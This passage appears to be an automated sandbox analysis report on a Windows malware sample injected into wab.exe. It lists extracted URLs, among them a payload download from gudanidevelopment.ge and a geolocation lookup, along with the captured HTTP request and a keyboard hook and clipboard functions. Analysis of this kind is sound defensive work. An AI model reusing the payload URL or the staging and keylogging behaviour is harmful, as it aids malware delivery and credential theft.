              Source: wab.exe, wab.exe, 00000001.00000002.5949539890.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1153623965.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1197885709.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5950608330.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382301994.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1140668469.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1197627968.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5950608330.0000000000B50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000001.00000002.5950608330.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1382395875.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpsD
              Source: wab.exe, 00000001.00000002.5949539890.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.5965888002.0000000006BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin9/Lx
              Source: wab.exe, 00000001.00000002.5965888002.0000000006BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin
              Source: wab.exe, 00000001.00000002.5949539890.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bini(
              Source: DHRI_kurumsal_kimlik_rehberi-2023.exe, Retarded.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: wab.exe, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.1159360015.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000006.00000002.1158852090.0000000000C7C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: wab.exe, 00000006.00000002.1159360015.000000000348D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000001.00000002.5979330195.0000000037190000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000001.00000002.5979330195.0000000037190000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000004.00000002.1195537784.00000000005C3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1189969126.000000000480A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1189366332.000000000480A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1190099898.000000000480A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1189044645.000000000480A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1178960196.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1189832373.000000000480A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181939539.0000000004801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: wab.exe, 00000004.00000003.1179503387.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179415642.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181596502.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180117633.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179673515.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180065246.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179846071.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179767675.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179921984.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180010165.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: wab.exe, 00000004.00000003.1177800976.0000000004FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1177800976.0000000004FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync?
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: wab.exe, 00000004.00000003.1181596502.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 00000004.00000003.1193890837.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179503387.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180824622.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193835218.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180698751.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180762642.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180592747.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180117633.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180656495.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179673515.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180065246.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179846071.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179767675.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179921984.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180010165.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180941360.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180881677.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: wab.exe, 00000004.00000002.1195537784.00000000005C3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: wab.exe, 00000004.00000003.1193463144.0000000004804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1194243922.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1194414325.00000000047EE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179010846.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180065246.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179846071.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193945905.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193998375.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1178960196.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179767675.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179921984.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180010165.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180941360.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1177800976.0000000004FE1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180881677.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 00000004.00000003.1180656495.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1178960196.00000000047FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: wab.exe, 00000004.00000003.1177855988.0000000004800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 00000004.00000003.1193463144.0000000004804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: wab.exe, 00000004.00000003.1179253746.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179503387.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179092234.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1178881545.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1177608543.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180824622.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179415642.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179175840.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193835218.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180698751.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180762642.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180592747.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180117633.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179673515.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1194243922.00000000047EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1194414325.00000000047EE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179010846.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180065246.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179846071.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193945905.00000000047EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179010846.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180065246.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179846071.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1178960196.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179767675.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1179921984.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180010165.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180941360.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1180881677.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: wab.exe, 00000004.00000003.1177608543.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: wab.exe, 00000004.00000003.1192222584.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192004868.0000000004803000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192041280.0000000004803000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193463144.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192662040.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1196559113.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.g
              Source: wab.exe, 00000004.00000003.1191404293.0000000004806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: wab.exe, 00000004.00000003.1192222584.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192004868.0000000004803000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192041280.0000000004803000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1193463144.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1192662040.0000000004804000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1196559113.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.
              Source: wab.exe, wab.exe, 00000006.00000002.1158713515.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 00000004.00000003.1177608543.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: wab.exe, 00000004.00000003.1177608543.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: wab.exe, 00000004.00000003.1188749590.00000000047FC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1188822284.00000000047FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: wab.exe, 00000004.00000003.1181692997.00000000047F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: gudanidevelopment.ge
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,4_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,5_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_004072B5
